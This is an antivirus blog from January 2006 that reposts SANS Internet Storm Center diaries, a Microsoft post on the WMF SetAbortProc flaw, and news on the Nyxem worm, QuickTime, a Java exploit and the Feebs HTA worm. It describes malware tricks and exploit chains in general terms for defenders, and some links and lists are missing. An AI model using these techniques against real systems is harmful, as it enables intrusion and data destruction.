The Antivirus Guy Blog

Keeping people up to date with antivirus and security information

SANS – Internet Storm Center – What’s the threat? And who is noticing it? Nyxem_e versus CME 508

 What’s the threat? And who is noticing it? Nyxem_e versus CME 508

Published: 2006-01-22,
Last Updated: 2006-01-22 20:00:45 UTC by Patrick Nolan (Version: 4(click to highlight changes))

CME 508 does not threaten like Nyxem_e, on February 3rd and every third day of the month thereafter Nyxem.E will destroy users work (see F-Secure’s blog) when the worm activates and replaces “the content of user’s files with a text string “DATA Error [47 0F 94 93 F4 K5]”. Among these files are: DOC, XLS, MDB, MDE, PPT, PPS, ZIP, RAR, PDF, PSD and DMP” “on all available drives”, and yes, available = shared drives.

fwiw, I look at published email malware statistics daily, both Nyxem_e and CME 508 are approximately the same in volume reports, and nowhere near sober was last year as far as raw numbers go. But Nyxem.E has legs, it’s more like a centipede than a worm, and it’s not likely to drop off the radar soon, certainly not before the 3rd of February.

The Handlers diary previously referenced Nyxem.E in More on Blackmal/Grew/Nyxem (file deletion payload.
Source info – see the F-Secure Virus Information Pages : Nyxem.E

The vendors below do not mention the destruction of user work, as of the checking I just did, ymmv.
Also Known As: 

WORM_GREW.{A, B} [Trend Micro],
“It gathers email addresses from files with the following extension names:


W32.Blackmal.E@mm Symantec

W32/Nyxem-D [Sophos],

W32/MyWife.d@MM  [McAfee],

W32/Grew.A!wm (Fortinet),

W32/Small.KI@mm [Norman],

Win32/Blackmal.F [Computer Associates]

Tearec.A Panda

The CME reference is difficult but not impossible to follow. I’m reading CME links which show “Latest CME Identifiers CME-508“, however, that last 508 link has english that says the newest CME-ID is “CME-503  – Date Assigned 2006-01-20”. In any event I base my comment that “CME-508” is not a threat because I interpret vendor malware write-ups mentioning CME 503 as the “new” threat called CME-508 at The vendors are listing 503, none are using 508 ……

SANS – Internet Storm Center – Cooperative Cyber Threat Monitor And Alert System.


January 23, 2006 Posted by | Administrative | Leave a comment

SANS – Internet Storm Center – New mass mailer spreading (Blackmal/Grew/Nyxem) – With updated info

I have been watching this one since yesterday.  Hopefully the information out there will be clearer now that the AV companies have had time to analyze the virus. F-Secure reports that this virus is already ranked third in their Virus Statistics at the time of this writing, so this is spreading fast.

Symantec now has a cleaner for this virus, which can be found here:

McAfee and F-Secure also have descriptions for this virus, with completely different names.

McAfee: W32/MyWife.d@MM


Trend Micro is also tracking a WORM_NYXEM.E, that may be another variant of this worm, but no details are available of this writing.

Published: 2006-01-18,
Last Updated: 2006-01-18 03:15:12 UTC by Bojan Zdrnja (Version: 1)

We got several submissions of new mass mailer worm spreading around. Besides the usual stuff that worms do these days (disable AV programs, scan the local system to find new e-mail addresses) this one is a bit more interesting as the attachment can be either an executable file or a MIME file that contains an executable file.

The sample we received had attachment named Attachments00.HQX – which is actually just an uuencoded file:

begin 664 Attachments,zip                                      .SCR

You can also see a typical “insert a lot of spaces before the real extension” trick.

Detection of the worm is decent with various AV programs and they remain inconsistent for naming as always (Symantec calls this worm W32.Blackmal.E@mm, Trend Micro calls it WORM_GREW.A, while Sophos calls it W32/Nyxem-D – go figure!).
Seems like we’ll have to wait more for CME.

SANS – Internet Storm Center – Cooperative Cyber Threat Monitor And Alert System.

January 18, 2006 Posted by | Antivirus News, Virus Outbreaks | Leave a comment

SANS – Internet Storm Center – Apple QuickTime and iTunes continued

Apple QuickTime and iTunes continued(NEW)

Published: 2006-01-14,
Last Updated: 2006-01-14 02:11:18 UTC by Swa Frantzen (Version: 1)
Apple seems to hit a rough spot in the road with their latest patches.


Accusations of the software’s main new feature calling home with track and artist names of the files you play. Now of course that’s needed to show related albums for you to buy, but there are a number of questions remaining open. Till then, perhaps it’s better not to have the call home feature if you value privacy or just have too many mp3s …


I have the original upgrade myself and no problem so far, but aparantly Apple has recalled it. And they also seem to have published it again. Bottom line: I’m confused. Take care with not updating QuickTime to 7.0.4. as it did patch 8 vulnerabilities. Perhaps that silly joke movie can wait a little longer than getting exploited.

Of course if you produce movies quicktime’s functionality might be more important than the security of your browser on the Internet and your risks might be different.

  • For general users, I would urge not to downgrade as you’ll have the vulnerabilities back. Moreover the problems seem to be not that clear. I’m running the initial Quicktime 7.0.4 uprade and it works just fine.
  • Still the uninstaller is here should you not be able to continue without the old version.

Before some of our readers think I’m bashing Apple: I’m typing this on a Mac, a Mac I like a lot.
Before some think I love Apple for all they do: I don’t, but that’s another story.

Swa Frantzen

SANS – Internet Storm Center – Cooperative Cyber Threat Monitor And Alert System.

January 14, 2006 Posted by | Administrative | Leave a comment

Welcome to the Microsoft Security Response Center Blog! : Looking at the WMF issue, how did it get there?

Looking at the WMF issue, how did it get there?

Hi everyone, Stephen Toulouse here. Now that the monthly release has passed and people are deploying the updates I wanted to take a moment to discuss some things related to questions we’ve been receiving on the recent WMF issue. (Which was addressed in MS06-001).

One question we’ve gotten is about SetAbortProc, the function that allows printing jobs to be cancelled. (The link is to the public documentation of the function)

Specifically people are wondering about how the vulnerability was present. Bear with me, I’m going to get rather technical here in the interests of clearly pointing it out. The long story short is that the vulnerability can be triggered with either correct OR incorrect metafile record size values, there seems to have been some confusion on that point.

To detail it a little bit, SetAbortProc functionality was a needed component in the graphics rendering environment for applications to register a callback to cancel printing, before even the WMF file format existed. Remember, those were the days of co-operative multitasking and the only way to allow the user to cancel a print job would be to call back to them, usually via a dialog. Around 1990, WMF support was added to Windows 3.0 as a file-based set of drawing commands for GDI to consume. The SetAbortProc functionality, like all the other drawing commands supported by GDI, was ported over (all in assembly language at this point) by our developers to be recognized when called from a WMF. This was a different time in the security landscape and these metafile records were all completely trusted by the OS. To recap, when it was introduced, the SetAbortProc functionality served an important function.

The vulnerability was introduced when all that GDI functionality was allowed to be called from metafiles. The potential danger of this type of metafile record was recognized and some applications (Internet Explorer, notably) will not process any metafile record of type META_ESCAPE, the overall type of the SetAbortProc record. That restriction is the reason it’s not possible to exploit this vulnerability by simply referencing an image directly in HTML. IE just won’t process it. How then is Internet Explorer an attack vector for the vulnerability? An example of that is through the Windows Picture and Fax Viewer. That application can convert a raw WMF into a printable EMF record. During this conversion, the application will process the META_ESCAPE record. All the current exploits we’re aware of are based on creating an html construct using an IFRAME. At a high level, the IFRAME passes off content to the Windows shell to display. The shell looks up the registered handler for WMF which is the Windows Picture and Fax Viewer (shimgvw.dll) by default. It can run into the vulnerability when converting a raw WMF to a printable EMF if MS06-001 is not applied to the system.

Now, there’s been some speculation that you can only trigger this by using an incorrect size in your metafile record and that this trigger was somehow intentional. That speculation is wrong on both counts. The vulnerability can be triggered with correct or incorrect size values. If you are seeing that you can only trigger it with an incorrect value, it’s probably because your SetAbortProc record is the last record in the metafile. The way this functionality works is by registering the callback to be called after the next metafile record is played. If the SetAbortProc record is the last record in the metafile, it will be more difficult to trigger the vulnerability.

The next question we’ve been getting is around previous operating systems like Windows 98, Windows 98 SE, and Windows Me. Specifically people are wondering why there is no update available for these platforms. Well first off it’s extremely important to note that these products are under an extended support lifecycle. Back in 2004, we made a decision that we would extend support for security updates for updates rated as Critical only through June of 2006 for these older operating systems. We publicly posted the policy at the following location:

With WMF we want to be very clear: the Windows 9x platform is not vulnerable to any “Critical” attack vector. The reason Windows 9x is not vulnerable to a “Critical” attack vector is because an additional step exists in the Win9x platform: When not printing to a printer, applications will simply never process the SetAbortProc record. Although the vulnerable code does exist in the Win9x platform, all “Critical” attack vectors are blocked by this additional step. The remaining attack vectors that we have identified require extensive user interaction and are not rated “Critical”. Again the “Critical” rating refers to code execution attacks that could result in automated attacks requiring little or no user interaction.

I’d like to thank the members of the Secure Windows Initiative team for the supplemental research and history on this.

Once again we urge everyone to deploy MS06-001 for the supported platforms, and thanks for the feedback we’ve been getting!


*This posting is provided “AS IS” with no warranties, and confers no rights.*

posted on Friday, January 13, 2006 11:57 PM by stepto

Welcome to the Microsoft Security Response Center Blog! : Looking at the WMF issue, how did it get there?.

January 14, 2006 Posted by | Security News | Leave a comment

Slashdot | WMF Vulnerability is an Intentional Backdoor?

WMF Vulnerability is an Intentional Backdoor?

Posted by Zonk on
Friday January 13, @12:36PM

from the take-with-a-grain-of-salt

An anonymous reader writes “Steve Gibson alleges
that the WMF vulnerability in Windows was neither a bug, nor a feature designed
without security in mind, but was actually an intentionally placed backdoor. In
more detailed
, Gibson explains that the way SetAbortProc works in
metafiles does not bear even the slightest resemblance to the way it works when
used by a program while printing. Based on the information presented, it really
does look like an intentional backdoor.” There’s a
transcript available of the ‘Security Now!’
podcast where Gibson discusses this.

Slashdot | WMF
Vulnerability is an Intentional Backdoor?

January 14, 2006 Posted by | Security News | Leave a comment

Symantec borrows page from Sony’s book

Symantec revealed
this week
that they have been using a rootkit like method, similar to Sony’s
BMG rootkit, in Norton SystemWorks 2005 and 2006 to hide a directory involved
with protecting items deleted from the Recycle Bin. 

The “Norton
Protected Recycle Bin” feature that is built in to recent versions of Norton
SystemWorks was designed to hide files from the Windows API, just as Sony’s BMG
Rootkit did; in a directory called “NProtect” that could be used to recover
deleted Recycle Bin files. This was supposed to prevent users from accidentally
deleting these files while cleaning up their PC.

After being warned by security experts, Mark Russinovich and researchers
at antivirus vendor F-Secure, that hiding this directory could give hackers a
great hiding place for infected programs, Symantec made an update for this issue
that is downloadable from LiveUpdate.

Even though this vulnerability is
considered to be
low risk, Symantec is “strongly” recommending
that SystemWorks users update their product immediately to ensure the greatest
protection from threats in the future.

What to do: Even though
virus definitions are handled automatically by Symantec LiveUpdate in default
configurations of SystemWorks 2005\2006, you have to manually run LiveUpdate to
get updates to the product itself.  To do this, open Norton SystemWorks
— usually found on the
desktop or at the of the Start Menu — then open LiveUpdate, and run
LiveUpdate until all available Symantec product updates have been installed.
These updates might require multiple reboots, depending on how many updates
you installation needs.

More information: eWeek, ZDNet, Secunia

January 14, 2006 Posted by | Security News | Leave a comment

From the Internet Storm Center – CERTs warn about old java bug being exploited

CERTs warn about old java bug being exploited

Published: 2006-01-13,
Last Updated: 2006-01-13
19:08:06 UTC by Swa Frantzen (Version: 3(click to
highlight changes)
warn about a bug in java being exploited. They claim bug was made public
in November 2005.Aside of the obvious patch and turn off java support,
the warnings include text as “avoid clicking on any links in emails or instant
messages, unless the email was already expected beforehand” and “by only
accessing Java applets from known and trusted sources the chances of
exploitation are reduced.”To the best of my knowledge the general user
population expects email. They use email to communicate with people they never
met before. And they will click on anything in it. Similarly they call it
“surfing the web”, they will click on links that lead to other sites. Telling
them not to do that is going to have as much effect as asking them not to laugh
at you. There are unfortunately only a very few exceptions where you might have
users and applications where you can limit the exposure. But as a general
recommendation it is rather worthless IMHO.So download that latest
greatest java environment now if you haven’t done so already and upgrade. Better
yet: check those browser settings and turn java off for all sites that you
either not trust 100% to execute code on your machines or that don’t absolutely
need it to work.

We have been informed
multiple times the hostile java seems to be at a webserver at fullchain [dot]
net. Might be interesting to check your logs in a corporate environment. The
supposedly hostile code is still there so we won’t be providing detailed URLs
for now. The class file on that website is not detected as malicious by any
anti-virus product participating in virustotal.Vince told it’s also
necessary to remove the old java environments, not just get the new ones as an
attacker can target the old environments when they are still

According to the bulletins you need
at least

  • Version 1.3.1_16 or later
  • Version 1.4.2_09 or later
  • Version (1.)5 update 4 or later


January 14, 2006 Posted by | Security News | Leave a comment

SANS – Internet Storm Center – New email virus making the rounds

Handler’s Diary January 11th

New email virus
making the rounds

Published: 2006-01-11,
Last Updated: 2006-01-11
22:28:25 UTC by Daniel Wesemann (Version: 1)
We are currently analyzing a copy of .. something.
Attachment name “”, detection by AV is still thin to nonexistent.
When run, the code tries to pull additional files from web servers in Russia, so
if you have a chance, you might consider blocking the following TLDs on your
proxy / / / / /

2200UTC: contains
a file named “Secure E-mail File.hta”, which is according to
current Virustotal output only detected by Panda and Kaspersky, the latter calls
it Worm.Win32.Feebs.k . Samples we’ve seen come in an email with subject “Secure
Message from user”. The HTA file is nicely obfuscated, it has 2
obfuscation functions, one being easy unescape, while the other one is a bit
more complex. Once it is executed by a user, it will run in the local zone, so
it can use various ActiveXObjects. It will try to download executables from 5
web sites (domains listed above), all of which are up and working at this

MD5 sums for the original exploit file and the two variants of
EXEs it downloads when run:
Secure E-mail File.hta


Analysis and write-up by fellow handler Bojan
Zdrnja. Thanks! 🙂

SANS – Internet Storm
Center – Cooperative Cyber Threat Monitor And Alert System

January 14, 2006 Posted by | Antivirus News, Virus Outbreaks | Leave a comment

SANS – Internet Storm Center – Quicktime patches for Mac and Windows

Handler’s Diary
January 10th 2006

Quicktime patches for Mac and Windows
Published: 2006-01-10,
Last Updated: 2006-01-10 20:55:19 UTC by Kyle
Haugsness (Version: 1)
Is Apple hiding behind Microsoft’s advisories? Seems
like Apple has been conveniently releasing security advisories on the same day
as Microsoft’s. Conspiracy theory? You be the judge.

Anyway, Apple
released a security update to Quicktime.
are multiple vulnerabilities patched. To summarize the advisory: A
maliciously-crafted GIF/TIFF/TGA/QTIF image or multimedia file may result in
arbitrary code execution. Well that pretty much covers the whole web browsing

Given the week we’ve had, I suppose that everyone should go back
to using netcat for surfing the web.

Update (from Scott):

those using Quicktime on Windows, a quick note about the versions of Quicktime
available to download at .  As of  5:30 UTC that
the default installer you download includes iTunes.  The version of Quicktime
included is 7.0.3 which is vulnerable per the advisory above. However, if you
download the standalone installer located at
, then you get the updated version of Quicktime 7.0.4.

Additionally, if
you try to update the software using the “Update existing software…” item
under the Help menu, then you receive a message about not being able to make an
Internet connection to the software server. I receive the same message if I use
the update message under the Quicktime settings window. Not sure if this is an
odd configuration problem on my end, or if their update server is having

SANS – Internet Storm Center –
Cooperative Cyber Threat Monitor And Alert System

January 14, 2006 Posted by | Security News | Leave a comment


Important Information for Thursday 5 January 2006

Microsoft announced that it would release a security update to help protect customers from exploitations of a vulnerability in the Windows Meta File (WMF) area of code in the Windows operating system on Tuesday, January 2, 2006, in response to malicious and criminal attacks on computer users that were discovered last week.

Microsoft will release the update today on Thursday, January 5, 2006, earlier than planned.

Microsoft originally planned to release the update on Tuesday, January 10, 2006 as part of its regular monthly release of security bulletins, once testing for quality and application compatibility was complete.
However, testing has been completed earlier than anticipated and the update is ready for release.

In addition, Microsoft is releasing the update early in response to strong customer sentiment that the release should be made available as soon as possible.

Microsoft’s monitoring of attack data continues to indicate that the attacks are limited and are being mitigated both by Microsoft’s efforts to shut down malicious Web sites and with up-to-date signatures form anti-virus companies.

The security update will be available at 2:00 pm PT as MS06-001.

Enterprise customers who are using Windows Server Update Services will receive the update automatically.  In additional the update is supported Microsoft Baseline Security Analyzer 2.0, Systems Management Server, and Software Update Services.  Enterprise customers can also manually download the update from the Download Center.

Microsoft will hold a special Web cast on Friday, January 6, 2006, to provide technical details on the MS06-001 and to answer questions.
Registration details will be available at

Microsoft will also be releasing additional security updates on Tuesday, January 10, 2006 as part of its regularly scheduled release of security updates.

What is this alert?

As part of the monthly security bulletin release cycle, Microsoft provides advance notification to our customers on the number of new security updates being released, the products affected, the aggregate maximum severity and information about detection tools relevant to the update. This is intended to help our customers plan for the deployment of these security updates more effectively.

In addition, to help customers prioritize monthly security updates with any non-security updates released on Microsoft Update, Windows Update, Windows Server Update Services and Software Update Services on the same day as the monthly security bulletins, we also provide:

*    Information about the release of updated versions of the
Microsoft Windows Malicious Software Removal Tool.
*    Information about the release of NON-SECURITY, High Priority
updates on Microsoft Update (MU), Windows Update (WU), Windows Server Update Services (WSUS) and Software Update Services (SUS). Note that this information will pertain ONLY to updates on Windows Update and only about High Priority, non-security updates being released on the same day as security updates. Information will NOT be provided about Non-security updates released on other days.

On 10 January 2006 Microsoft is planning to release:

Security Updates
*    1 Microsoft Security Bulletin affecting Microsoft Windows. The
highest Maximum Severity rating for these is Critical. These updates may require a restart. These updates will be detectable using the Microsoft Baseline Security Analyzer (MBSA).
*    1 Microsoft Security Bulletin affecting Microsoft Exchange and
Microsoft Office. The highest Maximum Severity rating for these is Critical. These updates may require a restart. These updates will be detectable using the Microsoft Baseline Security Analyzer (MBSA).

Microsoft Windows Malicious Software Removal Tool
*    Microsoft is planning to release an updated version of the
Microsoft Windows Malicious Software Removal Tool on Windows Update, Microsoft Update, Windows Server Update Services and the Download Center.
Note that this tool will NOT be distributed using Software Update Services (SUS).

Non-security High Priority updates on MU, WU, WSUS and SUS
*    Microsoft is planning to  release 1 NON-SECURITY High-Priority
Update on Windows Update (WU) and Software Update Services (SUS).
*    Microsoft is planning release 3 NON-SECURITY High-Priority
Updates on Microsoft Update (MU) and Windows Server Update Services

Although we do not anticipate any changes, the number of bulletins, products affected, restart information and severities are subject to change until released.

Microsoft will host a webcast next week to address customer questions on these bulletins. For more information on this webcast please see below:
*    TechNet Webcast: Information about Microsoft’s Security
Bulletins (Level 100)
*    Wednesday, January 11, 2006 11:00 AM (GMT-08:00) Pacific Time
(US & Canada
At this time no additional information on these bulletins such as details regarding severity or details regarding the vulnerability will be made available until 10 January 2006.

January 5, 2006 Posted by | Antivirus News, Security News | Leave a comment